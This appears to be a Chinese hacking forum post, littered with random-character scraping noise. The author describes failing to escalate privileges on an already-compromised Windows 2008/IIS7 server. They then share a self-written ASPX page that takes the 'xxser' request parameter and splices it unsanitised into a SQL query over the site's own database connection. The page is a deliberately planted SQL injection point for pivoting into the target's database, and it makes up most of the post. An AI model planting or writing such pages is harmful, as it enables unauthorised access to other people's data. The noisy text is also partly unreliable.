昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。% u0 N; v5 b9 |9 k+ a6 ^- j& S
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。/ w- g! J$ ?# q" ~5 x2 l
代码量不多,自己写个拉倒了。烦死了。
5 h; y. S# @$ }9 N% g% `( A6 z F# A% `: L7 _! Z5 z4 F, n9 R* v
$ T5 V0 o! x4 E# S<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
# g' C" p) M' M<html xmlns="http://www.w3.org/1999/xhtml">+ H0 H3 K0 ]! C6 ]+ y
<head runat="server">
3 u8 w6 M" g7 J4 G4 ?& W <title>暗影aspx构造注射专用页面</title>+ i* j- b+ ?6 C- t% `7 I8 W, A
</head>; v1 h5 E6 a4 M$ [/ H u3 G4 f! O
<body>- e5 n1 G8 q# j1 v4 g
<form id="form1" runat="server">
* n2 T E9 k; ?( } <div>
. R& `: d9 @9 L9 N" w9 u <script language="c#" runat="server">
, X9 f0 G: c5 v5 o i4 }( I
% G1 s- W1 }( u$ z j5 S void page_init(object sender, EventArgs e)
' Z7 D5 [1 G& p# J {' V: e$ v, i: l+ V0 y+ X( d' B
Z$ x9 X* Q# i4 b0 Q2 Y: c( C
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();8 N6 @# u- T8 H" u/ j# l" u6 T
, X o" X, Z( J6 [9 g. ?
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
$ T9 ^0 a j; | conn.Open();7 j% B! \! K2 | H
4 O" Y' b4 p) j' h- M' E string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
: n& F8 e8 `; y/ ^# ~4 Z! K* B* k( y
# ] Y5 n& S" x6 ~* |+ ?" [; ?. L System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);/ R3 i6 C1 P% i5 \- V* J
int x = command.ExecuteNonQuery();' |4 H7 H- j. d. L
Response.Write(i+"\n");* |0 e b; f8 }: P. m R# o
Response.Write(x);$ a( G9 r8 `! d9 K4 u% r
conn.Close();
9 x9 F( F C" [) t }
1 l( n' v' O) J8 ^7 @. M; q
8 e4 ~' H1 ?0 {8 ]* t </script># d/ y( G) x) U4 X2 J8 u! v- B# _! g2 g/ V
</div> V$ f# l; S! J
</form>
% e# F/ a, n5 Q( l, F</body>
! I# l% X: r% k$ w' Y* R. z' J8 ~</html>
7 m- a0 a1 \- P3 r3 r; y2 B$ r9 z |